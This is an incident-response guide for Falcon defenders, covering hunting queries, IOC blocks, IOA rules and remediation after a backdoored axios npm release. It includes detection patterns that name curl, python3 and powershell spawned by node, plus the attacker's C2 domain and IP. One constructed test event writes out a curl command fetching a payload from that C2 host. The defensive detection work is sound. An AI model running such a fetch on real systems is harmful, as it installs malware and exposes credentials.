Axios Supply Chain Attack: CrowdStrike Falcon Mitigation Guide#

Incident Date: March 31, 2026 (00:21–03:29 UTC)
Guide Published: April 1, 2026
Severity: Critical
Platform: CrowdStrike Falcon (All tiers)

For the full incident narrative and non-Falcon detection logic, see the companion article: Axios npm Supply Chain Attack: Incident Analysis & Response Guide


Overview#

On March 31, 2026, threat actors who had taken over the npm account of maintainer jasonsaayman published two backdoored versions of the axios npm package, 1.14.1 and 0.30.4. Each declared a new dependency, plain-crypto-js@4.2.1, in package.json; that package's postinstall script deployed a cross-platform Remote Access Trojan (RAT) to macOS, Windows, and Linux hosts during npm install. The RAT established persistent C2 communication to sfrclak.com:8000.

This guide covers the end-to-end CrowdStrike Falcon response workflow: threat hunting, IOC blocking, custom IOA rules, Real-Time Response remediation, and prevention hardening.


Attack Chain Summary#

| Stage | Action | CrowdStrike Visibility |
|---|---|---|
| 1 | npm installs axios@1.14.1 or 0.30.4 | ProcessRollup2 (npm/node) |
| 2 | plain-crypto-js@4.2.1 postinstall triggers setup.js | ProcessRollup2 (node → setup.js) |
| 3 | setup.js decodes double-layer obfuscated payload (reversed Base64 + XOR OrDeR_7077) | Script execution telemetry |
| 4 | Stage-1 dropper contacts sfrclak.com:8000/6202033 via HTTP POST | NetworkConnectIP4 / DnsRequest |
| 5 | Platform-specific RAT downloaded and written to disk | NewFileInfo |
| 6 | RAT establishes persistence, beacons every 60 seconds | NetworkConnectIP4 (recurring) |
| 7 | Dropper self-deletes | DeleteFile |

Section 1: Threat Hunting in Falcon Event Search (LogScale)#

Run these queries in Falcon Event Search (Next-Gen SIEM / LogScale). Adjust the @timestamp window to cover March 30–31, 2026 00:00–06:00 UTC for incident scoping, or set to a rolling 7-day window for ongoing monitoring.

Query 1 — Detect Malicious Postinstall Execution#

Catches node setup.js spawned from npm or node, the moment of initial compromise.

#event_simpleName=ProcessRollup2
| CommandLine=/setup\.js/i OR CommandLine=/plain-crypto-js/i
| ParentBaseFileName=/npm|node/i
| groupBy([ComputerName, UserName, CommandLine, ParentBaseFileName, ParentCommandLine, @timestamp])
| sort(@timestamp, order=desc)

What to look for: Any result from a developer workstation, CI/CD agent, or build server during the attack window. A single match is a confirmed exposure event.

Query 2 — Detect Anomalous Child Processes from npm/node#

Catches the dropper spawning platform download utilities (curl, python3, osascript, cscript) from within node_modules/.

#event_simpleName=ProcessRollup2
| ParentBaseFileName=/npm\.cmd|npm|node\.exe|node/i
| FileName=/curl|python3|osascript|cscript|powershell/i
| CommandLine=/node_modules/i OR ParentCommandLine=/node_modules/i
| groupBy([ComputerName, UserName, FileName, CommandLine, ParentBaseFileName, ParentCommandLine, @timestamp])
| sort(@timestamp, order=desc)

What to look for: node or npm spawning shell or download utilities directly. Expect some benign hits: native-module builds run python through node-gyp from inside node_modules, and a few packages fetch prebuilt binaries with curl in their postinstall. Baseline those by package path, then prioritise anything that fired in the attack window or whose command line references sfrclak.com, port 8000, or the drop locations in Query 4 (/tmp, %PROGRAMDATA%, /Library/Caches).

Query 3 — Detect C2 Network Connections#

Catches outbound connections to the C2 infrastructure at sfrclak.com / 142.11.206.73 on port 8000. Port 8000 on its own is a common local development port, so the IP match is the high-confidence half of this query; treat port-only hits as leads to inspect, not confirmations.

#event_simpleName=NetworkConnectIP4
| RemoteAddressIP4="142.11.206.73" OR RemotePort="8000"
| groupBy([ComputerName, UserName, RemoteAddressIP4, RemotePort, LocalAddressIP4, @timestamp])
| sort(@timestamp, order=desc)

Run the DNS lookup as a separate query; a resolution of the C2 domain shows the dropper ran even where the connection itself was blocked or failed:

#event_simpleName=DnsRequest
| DomainName=/sfrclak\.com/i
| groupBy([ComputerName, UserName, DomainName, @timestamp])
| sort(@timestamp, order=desc)

What to look for: Any hit here means the dropper reached the network. If this fires alongside Query 1, the host is compromised (RAT likely deployed).

Query 4 — Detect RAT Artifact File Writes#

Catches second-stage RAT files written to disk. TargetFileName carries the full path, and wt.exe is also the legitimate Windows Terminal binary (installed under WindowsApps), so the query excludes that location; the RAT copy of interest sits directly in %PROGRAMDATA%.

#event_simpleName=NewFileInfo
| TargetFileName=/wt\.exe|ld\.py|com\.apple\.act\.mond/i
| TargetFileName!=/WindowsApps/i
| groupBy([ComputerName, UserName, TargetFileName, TargetDirectoryName, @timestamp])
| sort(@timestamp, order=desc)

What to look for:

  • Windows: %PROGRAMDATA%\wt.exe
  • Linux: /tmp/ld.py
  • macOS: /Library/Caches/com.apple.act.mond

A match at one of these exact paths confirms second-stage deployment; treat the host as an active RAT infection. A wt.exe write anywhere else is most likely a Windows Terminal install or update and should be verified by path and signature before escalation.

Query 5 — Detect Dropper Self-Deletion (Anti-Forensics)#

Catches the postinstall dropper deleting itself to cover tracks.

#event_simpleName=DeleteFile
| TargetFileName=/setup\.js|plain-crypto-js/i
| ParentBaseFileName=/npm|node/i
| groupBy([ComputerName, UserName, TargetFileName, @timestamp])
| sort(@timestamp, order=desc)

Query 6 — Detect Recurring C2 Beaconing (60-Second Pattern)#

After deployment the RAT beacons every 60 seconds. This query identifies hosts with repeated outbound connections to port 8000. Note that count() writes its result to the _count field, which the threshold and the sort must reference.

#event_simpleName=NetworkConnectIP4
| RemotePort="8000"
| groupBy([ComputerName, RemoteAddressIP4], function=count())
| _count > 5
| sort(_count, order=desc)

What to look for: Hosts with more than 5 connections to port 8000, especially to 142.11.206.73. A count alone cannot distinguish a beacon from a developer's repeated requests to a local service on port 8000; for ambiguous hosts, pull the individual connection timestamps and check whether they fall about 60 seconds apart.
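The query above counts connections; it cannot tell a 60-second beacon from a developer hammering a local server on port 8000. The Python below is an added illustration, not part of the original guide or of CrowdStrike's tooling: it applies a cadence test (median inter-arrival time and its relative spread) to exported NetworkConnectIP4 records. The sample events are constructed; field names follow the queries above, with `timestamp` standing in for @timestamp as epoch seconds.

```python
import statistics
from collections import defaultdict


def make_events(host, remote_ip, remote_port, base_ts, offsets):
    """Build NetworkConnectIP4-shaped records; constructed sample data, not sensor output."""
    return [
        {
            "event_simpleName": "NetworkConnectIP4",
            "ComputerName": host,
            "RemoteAddressIP4": remote_ip,
            "RemotePort": remote_port,
            "timestamp": base_ts + off,  # epoch seconds, standing in for @timestamp
        }
        for off in offsets
    ]


BASE = 1_774_918_800  # 2026-03-31 01:00:00 UTC, inside the incident window
SAMPLE_EVENTS = (
    # Infected workstation: eight connections to the C2 about 60 s apart with a second of jitter
    make_events("dev-ws-01", "142.11.206.73", 8000, BASE, [0, 60, 121, 180, 240, 301, 360, 419])
    # Build agent talking to an internal dev server on port 8000 in bursts: same port, no cadence
    + make_events("build-agent-02", "10.0.0.5", 8000, BASE, [0, 3, 9, 40, 41, 200])
    # Only three connections: below the floor here, but Query 3 still surfaces the IP match
    + make_events("dev-ws-03", "142.11.206.73", 8000, BASE, [0, 60, 120])
    # Unrelated HTTPS traffic on another port: ignored by the port filter
    + make_events("dev-ws-01", "104.16.0.1", 443, BASE, [0, 5, 10, 15, 20, 25])
)


def find_beacons(events, port=8000, min_connections=5, max_jitter=0.2):
    """Group connections to `port` by (host, remote IP) and flag pairs whose inter-arrival
    times are regular: median absolute deviation of the gaps divided by the median gap is at
    most `max_jitter`. Irregular bursts to the same port do not qualify."""
    by_pair = defaultdict(list)
    for ev in events:
        if ev.get("event_simpleName") != "NetworkConnectIP4" or int(ev["RemotePort"]) != port:
            continue
        by_pair[(ev["ComputerName"], ev["RemoteAddressIP4"])].append(float(ev["timestamp"]))

    flagged = {}
    for pair, times in by_pair.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        median_gap = statistics.median(gaps)
        if median_gap <= 0:
            continue
        mad = statistics.median(abs(g - median_gap) for g in gaps)
        jitter = mad / median_gap
        if jitter <= max_jitter:
            flagged[pair] = {"count": len(times), "median_interval_s": median_gap, "jitter": round(jitter, 3)}
    return flagged


if __name__ == "__main__":
    for (host, ip), info in find_beacons(SAMPLE_EVENTS).items():
        print(f"{host} -> {ip}:8000  {info['count']} connections, "
              f"median {info['median_interval_s']:.0f}s apart, jitter {info['jitter']}")
```

Run against a real export by replacing SAMPLE_EVENTS with the parsed rows (`@timestamp` is in milliseconds in LogScale exports, so divide by 1000 first). Lowering `min_connections` trades sensitivity for noise; the three-connection host above is flagged at a floor of 3 but not at the default 5.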

Query 7 — Full Compromise Assessment (Combined)#

Use this broad sweep to identify all potentially affected hosts in one pass.

(#event_simpleName=ProcessRollup2 CommandLine=/plain-crypto-js|setup\.js/i)
OR (#event_simpleName=NetworkConnectIP4 RemoteAddressIP4="142.11.206.73")
OR (#event_simpleName=DnsRequest DomainName=/sfrclak\.com/i)
OR (#event_simpleName=NewFileInfo TargetFileName=/wt\.exe|ld\.py|com\.apple\.act\.mond/i)
| groupBy([ComputerName, UserName, #event_simpleName, @timestamp])
| sort(@timestamp, order=desc)

Section 2: IOC Management — Block at Sensor Level#

Add the following indicators to Falcon IOC Management (Endpoint Security → IOC Management → Create IOC). Set action to Block + Detect for all.

Domains and IPs#

| Type | Value | Action | Policy |
|---|---|---|---|
| Domain | sfrclak.com | Block + Detect | All Prevention Policies |
| IPv4 | 142.11.206.73 | Block + Detect | All Prevention Policies |

Steps:

  1. Navigate to Falcon Console → Endpoint Security → IOC Management
  2. Select Create Indicator
  3. Enter each value, set Action: Block, Severity: Critical, and apply to all relevant Host Groups
  4. Enable Apply to all platforms
  5. Confirm that Custom Blocking is enabled in the prevention policies assigned to those hosts; without it, Block-action indicators only generate detections

File Hashes#

If you recover the RAT binaries from affected endpoints, compute their SHA256 hashes (Get-FileHash, sha256sum and shasum -a 256 in the RTR sections below) and submit them as Custom Hashes with Block + Detect. Do not confuse these with the integrity field in package-lock.json: that is a sha512 of the npm tarball, useful for proving which plain-crypto-js@4.2.1 artifact a project fetched, but not a value Falcon can block on. Hash, then remove, the following artifacts:

| File | Platform | Path | Action |
|---|---|---|---|
| wt.exe | Windows | %PROGRAMDATA%\wt.exe | Hash-block, then delete via RTR |
| ld.py | Linux | /tmp/ld.py | Hash-block, then delete via RTR |
| com.apple.act.mond | macOS | /Library/Caches/com.apple.act.mond | Hash-block, then delete via RTR |

Section 3: Custom IOA Rules#

Deploy these Custom IOA rules to detect, and after tuning prevent, this attack pattern on an ongoing basis. They key on behaviour rather than on the C2 domain or package name, so they still fire when a future variant changes infrastructure. Two mechanics matter when entering them: rule groups are created per platform (separate groups for Windows, Mac and Linux), so each rule is entered once per platform you cover; and the patterns are regular expressions that must match the entire field value, which is why every pattern below is wrapped in `.*`.

Navigate to: Falcon Console → Endpoint Security → Custom IOA Rules → Create Rule Group

Rule 1 — npm/node Spawning Download Utilities#

Rule Type: Process Creation
Platform: Windows, Linux, macOS
Name: SUPPLY-CHAIN-001: Node Spawning Suspicious Child Process

| Field | Value |
|---|---|
| Parent Image Filename | `.*npm.*\|.*node.*` |
| Image Filename | `.*curl.*\|.*python3.*\|.*osascript.*\|.*cscript.*\|.*powershell.*` |
| Command Line | `.*node_modules.*` |
| Action | Detect (promote to Prevent after validation) |
| Severity | Critical |

Rule 2 — Node Executing Postinstall Scripts with Obfuscation Markers#

Rule Type: Process Creation
Platform: Windows, Linux, macOS
Name: SUPPLY-CHAIN-002: Node Postinstall Obfuscated Execution

| Field | Value |
|---|---|
| Parent Image Filename | `.*npm.*\|.*node.*` |
| Command Line | `.*setup\.js.*\|.*postinstall.*` |
| Action | Detect |
| Severity | High |

npm runs lifecycle scripts through a shell (sh -c on POSIX, cmd.exe on Windows), so the process that executes setup.js may have sh or cmd as its immediate parent rather than node. If this rule stays quiet on a host you know was exposed, extend the parent pattern to include the shell binaries or move the npm/node match to the Grandparent Image Filename field.

Rule 3 — Suspicious Outbound from npm Context#

Rule Type: Network Connection (confirm the rule type is offered for your platform and sensor version)
Name: SUPPLY-CHAIN-003: npm Context Outbound to Non-registry Host

| Field | Value |
|---|---|
| Image Filename | `.*npm.*\|.*node.*` |
| Remote TCP/UDP Port | `8000` |
| Remote IP Address | `142\.11\.206\.73` to start; widen to other non-registry hosts only after baselining |
| Action | Detect |
| Severity | Critical |

The intent here, any npm-context connection that is not going to the npm registry, is hard to state directly: the rule regexes have no negation, and the registry's CDN addresses change, so an allow-list of registry ranges goes stale. Start with the known C2 address and port, review what a port-8000-only variant produces in your environment, and tighten from there.

Rules are inert until the rule group is enabled and assigned to the prevention policies that cover developer workstations and build agents. After assignment, confirm a test detection before promoting any rule from Detect to Prevent.
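Custom IOA patterns are matched against the whole field value, so `curl` alone never matches `/usr/bin/curl`; that is why every pattern above carries `.*` on both sides. The Python below is an added example, not CrowdStrike code: it replays Rule 1 and Rule 2 against constructed process-creation events the way the sensor evaluates them. One event shows a node-gyp build tripping Rule 1 (the reason it starts in Detect); one shows a download child whose own command line never mentions node_modules slipping past Rule 1 unless the rule also inspects Parent Command Line, a field the Process Creation rule type offers and that Query 2 in Section 1 already uses; one shows setup.js running under npm's shell wrapper, which Rule 2 as written misses. The `exclude` map models a per-field exclusion for tuning. Field names are the IOA fields written as identifiers; the paths and command lines are illustrative assumptions, not artifacts recovered from the incident.

```python
import re

# Rules transcribed from Section 3. Keys are the Custom IOA fields (Parent Image FileName,
# Image FileName, Command Line, Parent Command Line) written as identifiers.
RULE_1 = {
    "name": "SUPPLY-CHAIN-001",
    "include": {
        "ParentImageFileName": r".*npm.*|.*node.*",
        "ImageFileName": r".*curl.*|.*python3.*|.*osascript.*|.*cscript.*|.*powershell.*",
        "CommandLine": r".*node_modules.*",
    },
}
# Variant that inspects the parent's command line instead, as Query 2 in Section 1 already does.
RULE_1_PARENT = {
    "name": "SUPPLY-CHAIN-001b",
    "include": {
        "ParentImageFileName": RULE_1["include"]["ParentImageFileName"],
        "ImageFileName": RULE_1["include"]["ImageFileName"],
        "ParentCommandLine": r".*node_modules.*",
    },
}
# Rule 1 with a tuning exclusion for node-gyp native builds, the usual benign source of node -> python3.
RULE_1_TUNED = {
    "name": "SUPPLY-CHAIN-001 (tuned)",
    "include": RULE_1["include"],
    "exclude": {"CommandLine": r".*node_modules[/\\]node-gyp[/\\].*"},
}
RULE_2 = {
    "name": "SUPPLY-CHAIN-002",
    "include": {
        "ParentImageFileName": r".*npm.*|.*node.*",
        "CommandLine": r".*setup\.js.*|.*postinstall.*",
    },
}
ALL_RULES = [RULE_1, RULE_1_PARENT, RULE_1_TUNED, RULE_2]


def ioa_matches(rule, event):
    """True when every include pattern fully matches its field (case-insensitive, anchored at
    both ends like Falcon's matching) and no exclude pattern does. Missing fields never match."""
    for field, pattern in rule.get("include", {}).items():
        if re.fullmatch(pattern, event.get(field, ""), re.IGNORECASE) is None:
            return False
    for field, pattern in rule.get("exclude", {}).items():
        if re.fullmatch(pattern, event.get(field, ""), re.IGNORECASE) is not None:
            return False
    return True


def matching_rules(rules, event):
    """Names of the rules that would fire on one process-creation event."""
    return [rule["name"] for rule in rules if ioa_matches(rule, event)]


# Constructed process events. Paths and command lines are illustrative, not recovered from the incident.
EV_SETUP_JS = {  # the postinstall script starting under node
    "ParentImageFileName": "/usr/local/bin/node", "ParentCommandLine": "node /usr/local/bin/npm install",
    "ImageFileName": "/usr/local/bin/node", "CommandLine": "node /home/dev/app/node_modules/plain-crypto-js/setup.js",
}
EV_SETUP_JS_VIA_SH = {  # the same step when npm's shell wrapper is the immediate parent
    "ParentImageFileName": "/bin/sh", "ParentCommandLine": "sh -c node setup.js",
    "ImageFileName": "/usr/local/bin/node", "CommandLine": "node setup.js",
}
EV_DROPPER_CURL = {  # a download child whose own arguments never mention node_modules
    "ParentImageFileName": "/usr/local/bin/node",
    "ParentCommandLine": "node /home/dev/app/node_modules/plain-crypto-js/setup.js",
    "ImageFileName": "/usr/bin/curl", "CommandLine": "curl -s http://sfrclak.com:8000/6202033 -o /tmp/ld.py",
}
EV_NODE_GYP = {  # benign native-module build
    "ParentImageFileName": "/usr/local/bin/node",
    "ParentCommandLine": "node /home/dev/app/node_modules/node-gyp/bin/node-gyp.js rebuild",
    "ImageFileName": "/usr/bin/python3", "CommandLine": "python3 /home/dev/app/node_modules/node-gyp/gyp/gyp_main.py -f make",
}
EV_BENIGN_CURL = {  # curl from an interactive shell
    "ParentImageFileName": "/bin/bash", "ParentCommandLine": "bash",
    "ImageFileName": "/usr/bin/curl", "CommandLine": "curl -sI https://registry.npmjs.org/axios",
}

if __name__ == "__main__":
    for label, ev in [("setup.js under node", EV_SETUP_JS), ("setup.js under sh", EV_SETUP_JS_VIA_SH),
                      ("dropper curl", EV_DROPPER_CURL), ("node-gyp build", EV_NODE_GYP), ("shell curl", EV_BENIGN_CURL)]:
        print(f"{label:20} -> {matching_rules(ALL_RULES, ev) or 'no rule fires'}")
```

The takeaway for the rules as entered in Falcon: pair Rule 1 with a Parent Command Line variant so a child process with clean arguments still fires, add an exclusion for node-gyp before promoting to Prevent, and give Rule 2 a shell-aware parent pattern or a Grandparent Image Filename match.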


Section 4: Network Containment#

For any host where Query 3 (C2 connection) or Query 4 (RAT artifact) fired, immediately apply Network Containment.

Steps#

  1. In Falcon Console → Endpoint Security → Endpoint Management, locate the affected host
  2. Select the host → Actions → Network Contain
  3. Confirm containment — the host retains Falcon sensor connectivity but all other network traffic is blocked
  4. Proceed to Real-Time Response (Section 5) for cleanup before releasing containment

Do NOT release containment until RAT artifacts are removed and persistence mechanisms are cleared.

Bulk Containment via API (for CI/CD agents)#

If multiple build agents are affected, use the FalconPy SDK. The API client needs the Hosts: Write scope; the device query pages at 100 results, and containment is requested in batches of the same size:

import os
from falconpy import Hosts

# Read credentials from the environment rather than hardcoding them in the script.
falcon = Hosts(client_id=os.environ["FALCON_CLIENT_ID"],
               client_secret=os.environ["FALCON_CLIENT_SECRET"])

# Collect every device ID matching the FQL filter (tag or hostname pattern); the endpoint pages at 100.
device_ids = []
while True:
    resp = falcon.query_devices_by_filter(filter="hostname:'build-agent-*'", limit=100, offset=len(device_ids))
    if resp["status_code"] != 200:
        raise SystemExit(f"Device query failed: {resp['body'].get('errors')}")
    device_ids += resp["body"]["resources"]
    if not resp["body"]["resources"] or len(device_ids) >= resp["body"]["meta"]["pagination"]["total"]:
        break

# Contain in batches of 100 and check each response; HTTP 202 means the request was accepted.
for batch in (device_ids[i:i + 100] for i in range(0, len(device_ids), 100)):
    resp = falcon.perform_action(action_name="contain", ids=batch)
    print(f"Contain request for {len(batch)} hosts: HTTP {resp['status_code']}")
print(f"Containment requested for {len(device_ids)} hosts")

Section 5: Real-Time Response (RTR) — Remediation Commands#

Connect to contained hosts via RTR (Endpoint Management → Real-Time Response) to perform cleanup. These commands confirm compromise status, preserve hashes and connection evidence, and remove RAT artifacts. RTR runs as SYSTEM on Windows and root on Linux and macOS, which matters for anything that expands a home directory or user hive.

Windows RTR Commands#

# 1. Find installed axios packages at the backdoored versions. The version lives in
#    node_modules\axios\package.json; consumer manifests only hold ranges such as "^1.14.1".
#    Narrow -Path to repository and CI roots where you can; a full C:\ walk is slow.
Get-ChildItem -Path C:\ -Recurse -Filter package.json -ErrorAction SilentlyContinue |
  Where-Object { $_.Directory.Name -eq 'axios' } |
  Select-String -Pattern '"version":\s*"(1\.14\.1|0\.30\.4)"' | Select-Object Path, Line

# 2. Check for the RAT artifact (the %PROGRAMDATA% copy only; Windows Terminal ships a legitimate wt.exe under WindowsApps)
Test-Path "$env:PROGRAMDATA\wt.exe"
Get-Item "$env:PROGRAMDATA\wt.exe" -ErrorAction SilentlyContinue | Select-Object FullName, CreationTime, LastWriteTime, Length

# 3. Record the hash and active C2 connections before touching anything (the hash feeds IOC Management, Section 2)
Get-FileHash "$env:PROGRAMDATA\wt.exe" -Algorithm SHA256 -ErrorAction SilentlyContinue
netstat -ano | findstr "142.11.206.73"
netstat -ano | findstr ":8000"

# 4. Kill the running RAT first; Remove-Item fails on a locked executable
Get-Process | Where-Object { $_.Path -eq "$env:PROGRAMDATA\wt.exe" } | Stop-Process -Force

# 5. Remove the artifact
Remove-Item "$env:PROGRAMDATA\wt.exe" -Force -ErrorAction SilentlyContinue

# 6. Check persistence: machine and per-user Run keys (HKCU is SYSTEM's hive under RTR, so walk HKU) and scheduled task actions
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" | Format-List
Get-ChildItem Registry::HKEY_USERS | ForEach-Object { Get-ItemProperty "Registry::$($_.Name)\Software\Microsoft\Windows\CurrentVersion\Run" -ErrorAction SilentlyContinue }
Get-ScheduledTask | Where-Object { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -match 'wt\.exe|ProgramData' } | Select-Object TaskName, TaskPath

Linux RTR Commands#

# 1. Check for the RAT artifact and hash it before removal (the SHA256 feeds IOC Management, Section 2)
ls -la /tmp/ld.py 2>/dev/null && echo "RAT FOUND" || echo "Not present"
sha256sum /tmp/ld.py 2>/dev/null

# 2. Capture active C2 connections before killing anything; the last column names the owning process
ss -tnp | grep -F 142.11.206.73
ss -tnp | grep -F ':8000'

# 3. Kill the running process, then remove the artifact
pkill -f "ld.py" 2>/dev/null
rm -f /tmp/ld.py

# 4. Check for persistence: every user's crontab, the cron directories, and system and user systemd units
for u in $(cut -d: -f1 /etc/passwd); do crontab -l -u "$u" 2>/dev/null | grep -i "ld.py\|npm\|node" | sed "s/^/$u: /"; done
find /etc/cron.* /var/spool/cron -type f 2>/dev/null | xargs grep -l "ld.py" 2>/dev/null
find /etc/systemd/system /usr/lib/systemd/system /home/*/.config/systemd/user -name "*.service" 2>/dev/null | \
  xargs grep -l "ld.py" 2>/dev/null

# 5. Audit installed axios copies (the version is in the package's own package.json, not the consumer's)
find / -path "*/node_modules/axios/package.json" 2>/dev/null | \
  xargs grep -lE '"version": "(1\.14\.1|0\.30\.4)"' 2>/dev/null

macOS RTR Commands#

# 1. Check for the RAT artifact and hash it before removal
ls -la "/Library/Caches/com.apple.act.mond" 2>/dev/null && echo "RAT FOUND" || echo "Not present"
shasum -a 256 "/Library/Caches/com.apple.act.mond" 2>/dev/null

# 2. Capture active C2 connections before killing anything
lsof -i :8000 | grep -v LISTEN
lsof -i @142.11.206.73

# 3. Kill the running process, then remove the artifact
pkill -f "com.apple.act.mond" 2>/dev/null
rm -f "/Library/Caches/com.apple.act.mond"

# 4. Check for persistence. RTR runs as root, so ~ expands to /var/root; enumerate every user's LaunchAgents explicitly
find /Library/LaunchAgents /Library/LaunchDaemons /Users/*/Library/LaunchAgents -name "*.plist" 2>/dev/null | \
  xargs grep -l "act.mond\|plain-crypto" 2>/dev/null

# 5. Inspect, unload and remove any plist found in step 4 (the path below is an example; substitute the real hit)
PLIST="/Users/<user>/Library/LaunchAgents/com.apple.act.mond.plist"
plutil -p "$PLIST" 2>/dev/null
launchctl unload "$PLIST" 2>/dev/null
rm -f "$PLIST" 2>/dev/null

Section 6: npm Package Remediation#

After RAT removal, remediate the npm dependency itself on all affected systems.

Verify Exposure#

# Check all installed axios versions across project dependencies
npm list axios 2>/dev/null
find . -name "package-lock.json" -exec grep -l '"axios"' {} \;
find . -name "package.json" -not -path "*/node_modules/*" | \
  xargs grep -l '"axios"'

Remove and Replace#

# Uninstall the backdoored version and install a clean one. Use --ignore-scripts for this first pass so
# no lifecycle script in the still-compromised tree runs again; verify the tree before a normal install.
npm uninstall axios --ignore-scripts
npm install axios@1.14.0 --ignore-scripts    # or the latest version the advisory confirms clean

# Confirm plain-crypto-js is gone
npm list plain-crypto-js       # should report (empty)
find ./node_modules -name "plain-crypto-js" -type d  # should return nothing

# Regenerate the lock file and purge the npm cache, which may still hold the malicious tarballs
rm -f package-lock.json
npm cache clean --force
npm install

Verify Package Integrity#

# Confirm axios version and lack of malicious dependency
npm list axios | grep axios
cat node_modules/axios/package.json | grep -E '"version"|"dependencies"'

# The clean axios should NOT contain plain-crypto-js in its dependencies
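To sweep many repositories and CI workspaces without running npm in each, scan the lock files directly. The scanner below is an added example, not part of the original guide: it reads lockfileVersion 1 (nested `dependencies`) and 2/3 (`packages`, keyed by install path), flags axios 1.14.1 / 0.30.4 and plain-crypto-js 4.2.1, and returns each hit's `resolved` URL and `integrity` value so the exact tarball can be recorded for the incident. That `integrity` is a sha512 of the tarball, not the SHA256 of an on-disk binary that Falcon hash IOCs expect. Both sample lock files are constructed.

```python
import json
import os
import sys

# Versions named in this guide: the two backdoored axios releases and the injected dependency.
MALICIOUS_VERSIONS = {"axios": {"1.14.1", "0.30.4"}, "plain-crypto-js": {"4.2.1"}}


def _check(path, name, meta, findings):
    """Append a finding when this lock entry is one of the known-bad name/version pairs."""
    if meta.get("version") in MALICIOUS_VERSIONS.get(name, ()):
        findings.append({
            "path": path,
            "name": name,
            "version": meta.get("version"),
            "resolved": meta.get("resolved"),
            "integrity": meta.get("integrity"),
        })


def _walk_v1(deps, prefix, findings):
    # lockfileVersion 1 nests transitive dependencies under each entry's own "dependencies".
    for name, meta in deps.items():
        path = f"{prefix}node_modules/{name}"
        _check(path, name, meta, findings)
        _walk_v1(meta.get("dependencies", {}), path + "/", findings)


def scan_lockfile(lock):
    """Return a list of findings for a parsed package-lock.json of any lockfileVersion."""
    findings = []
    if "packages" in lock:  # lockfileVersion 2 and 3: flat map keyed by install path
        for path, meta in lock["packages"].items():
            if not path:  # "" is the root project itself
                continue
            # "node_modules/a/node_modules/@scope/b" -> "@scope/b"; aliased installs carry an explicit "name"
            name = meta.get("name") or path.rsplit("node_modules/", 1)[-1]
            _check(path, name, meta, findings)
    elif "dependencies" in lock:  # lockfileVersion 1
        _walk_v1(lock["dependencies"], "", findings)
    return findings


def scan_tree(root):
    """Walk a checkout for package-lock.json files (skipping node_modules) and scan each."""
    results = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d != "node_modules"]
        if "package-lock.json" in filenames:
            lock_path = os.path.join(dirpath, "package-lock.json")
            with open(lock_path, encoding="utf-8") as fh:
                results[lock_path] = scan_lockfile(json.load(fh))
    return results


# Constructed sample lock files (not real data). Integrity values are placeholders.
SAMPLE_LOCK_V3 = {
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "dependencies": {"axios": "^1.14.0"}},
        "node_modules/axios": {
            "version": "1.14.1",
            "resolved": "https://registry.npmjs.org/axios/-/axios-1.14.1.tgz",
            "integrity": "sha512-CONSTRUCTED-PLACEHOLDER",
            "dependencies": {"plain-crypto-js": "4.2.1"},
        },
        "node_modules/plain-crypto-js": {
            "version": "4.2.1",
            "resolved": "https://registry.npmjs.org/plain-crypto-js/-/plain-crypto-js-4.2.1.tgz",
            "integrity": "sha512-CONSTRUCTED-PLACEHOLDER",
        },
        "node_modules/follow-redirects": {"version": "1.15.9"},
    },
}
SAMPLE_LOCK_V1 = {
    "lockfileVersion": 1,
    "dependencies": {
        "legacy-lib": {"version": "2.0.0", "dependencies": {"axios": {"version": "0.30.4"}}},  # nested old line
        "axios": {"version": "1.14.0"},  # clean version at the top level
    },
}

if __name__ == "__main__":
    for label, lock in (("v3 sample", SAMPLE_LOCK_V3), ("v1 sample", SAMPLE_LOCK_V1)):
        for f in scan_lockfile(lock):
            print(f"{label}: {f['path']} {f['name']}@{f['version']} resolved={f['resolved']}")
    if len(sys.argv) > 1:  # scan a real checkout: python3 scan_locks.py ~/src
        for lock_path, findings in scan_tree(sys.argv[1]).items():
            for f in findings:
                print(f"{lock_path}: {f['path']} {f['name']}@{f['version']}")
```

The lock file records what npm resolved, not necessarily what is on disk: a tree installed before the lock was regenerated, or an npm cache that was not purged, can still hold the malicious packages, so pair this scan with the node_modules checks in Section 5 on hosts that ran the install.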

Section 7: Credential Rotation Requirements#

Any environment that ran npm install and resolved axios to 1.14.1 or 0.30.4 must treat every secret reachable from that host as compromised; the RAT had the installing user's full file system and network access. The registry served the backdoored versions between roughly March 30, 2026 23:59 UTC and March 31, 2026 03:29 UTC (a conservative buffer around the 00:21–03:29 UTC publication window), but a later install from a lock file that pins those versions, or from a warm npm or CI cache, is equally exposed, so scope by what was installed, not only by when.

Rotate Immediately#

  • Cloud provider credentials (AWS, Azure, GCP) — IAM keys, service account tokens
  • CI/CD pipeline secrets (GitHub Actions secrets, Jenkins credentials, GitLab CI variables)
  • Database passwords and connection strings
  • API keys for third-party services
  • SSH private keys present on the system
  • npm tokens (if present in .npmrc or environment variables)
  • .env files and application configuration secrets

CrowdStrike Falcon Identity Protection#

Falcon Identity Protection adds account-centric views of the same activity, but the sensor's own UserLogon events are enough to start. Query logons on the affected hosts (by agent ID) from the attack window onward:

#event_simpleName=UserLogon
| in(aid, values=["<aid-1>", "<aid-2>"])   // substitute the affected host AIDs from the earlier queries
| groupBy([ComputerName, UserName, LogonType, RemoteAddressIP4, @timestamp])
| sort(@timestamp, order=asc)

Look for unusual logons on these hosts after the attack window. Then pivot outward: run the same query without the aid filter, matching RemoteAddressIP4 against the affected hosts' addresses, to find other systems the harvested credentials were used against. That outbound use is the lateral movement that matters.


Section 8: Prevention Policy Hardening#

After the incident, update your Falcon Prevention Policies to reduce exposure to future supply chain attacks.

| Category | Setting | Recommended Value |
|---|---|---|
| Malware Protection | Machine Learning — Detection Threshold | Aggressive |
| Malware Protection | Machine Learning — Prevention Threshold | Moderate or higher |
| Malware Protection | Sensor-based ML | Enabled |
| Behavior-Based Detection | Suspicious Scripts | Enabled |
| Behavior-Based Detection | Interpreter Only | Enabled |
| Behavior-Based Detection | Prevent Suspicious Processes | Enabled |
| Exploit Mitigation | Script Control | Enabled |
| Intelligence | Custom IOA Rules (Section 3 above) | Assigned + Enabled |

Script Control Considerations#

